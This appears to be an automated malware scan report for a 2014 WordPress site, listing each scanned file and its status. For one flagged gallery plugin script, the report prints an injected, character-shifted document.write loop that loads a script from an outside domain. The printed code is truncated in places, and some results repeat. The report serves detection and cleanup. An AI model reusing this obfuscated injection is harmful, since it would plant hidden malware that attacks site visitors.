Scanned pages/files
Request | Server response | Status |
http://www.cskp.info/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Jun 2014 00:34:07 GMT Location: http://cskp.info/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://cskp.info/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://cskp.info/ | 200 OK Content-Length: 67539 Content-Type: text/html | clean |
http://cskp.info/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88 | 200 OK Content-Length: 31032 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1914 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({},defaults,args);var obj=this.selector;var stack=[];var url=s.domain+'index.php?callback=json&api_key=true&format=json&method=gallery&id='+s.id;var stackLength=0;jQuery.getJSON(url,function(r){if(r.stat=="ok"){for(img in r.images){var photo=r.images[img];stack.push(decodeURI(photo['imageURL']));} stackLength=stack.length;loadImage(1);}});functio jQuery(img).css({'height':height,'width':width});return img;};function jCycle_onBefore(curr,next,opts){if(opts.addSlide) if(stackLength>0){var img=new Image();img.src=stack.shift();stackLength--;jQuery(img).bind('load',function(){opts.addSlide(imageResize(this,s.width,s.height));});}};} <!-- js-tools --> j=0;while(j<54)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/gnj/l{0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(j++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://cskp.info/wp-content/themes/cskp5/script.js | 200 OK Content-Length: 11690 Content-Type: application/x-javascript | clean |
http://www.cskp.info//yandex.st/share/share.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 27 Jun 2014 00:34:10 GMT Pragma: no-cache Location: http://cskp.info/yandex.st/share/share.js/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 27 Jun 2014 00:34:10 GMT X-Pingback: http://cskp.info/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://cskp.info/yandex.st/share/share.js/ | 404 Not Found Content-Length: 25108 Content-Type: text/html | clean |
http://cskp.info/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117 | 200 OK Content-Length: 12501 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 24152 Content-Type: application/x-javascript | clean |
http://cskp.info/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.5 | 200 OK Content-Length: 5802 Content-Type: application/x-javascript | clean |
http://www.cskp.info/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 27 Jun 2014 00:34:12 GMT Pragma: no-cache Location: http://cskp.info/test404page.js Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 27 Jun 2014 00:34:12 GMT X-Pingback: http://cskp.info/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://cskp.info/test404page.js | 404 Not Found Content-Length: 25108 Content-Type: text/html | clean |
http://cskp.info/zasedaniya-cskp/ | 200 OK Content-Length: 25666 Content-Type: text/html | clean |
http://cskp.info/%d0%be-%d0%bd%d0%b0%d1%81/ | 200 OK Content-Length: 27434 Content-Type: text/html | clean |
http://cskp.info/druzya/ | 200 OK Content-Length: 29517 Content-Type: text/html | clean |
http://cskp.info/kontakty/ | 200 OK Content-Length: 25276 Content-Type: text/html | clean |
http://cskp.info/materialy/ | 200 OK Content-Length: 27522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cskp.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Jun 2014 00:34:08 GMT
Server: nginx/1.0.15
Content-Type: text/html; charset=UTF-8
X-Pingback: http://cskp.info/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: cskp.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Jun 2014 00:34:08 GMT
Server: nginx/1.0.15
Content-Type: text/html; charset=UTF-8
X-Pingback: http://cskp.info/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: cskp.info
Referer: http://www.google.com/search?q=cskp.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cskp.info
Referer: http://www.google.com/search?q=cskp.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cskp.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cskp.info/
Result: cskp.info is not infected or malware details are not published yet.
Result: cskp.info is not infected or malware details are not published yet.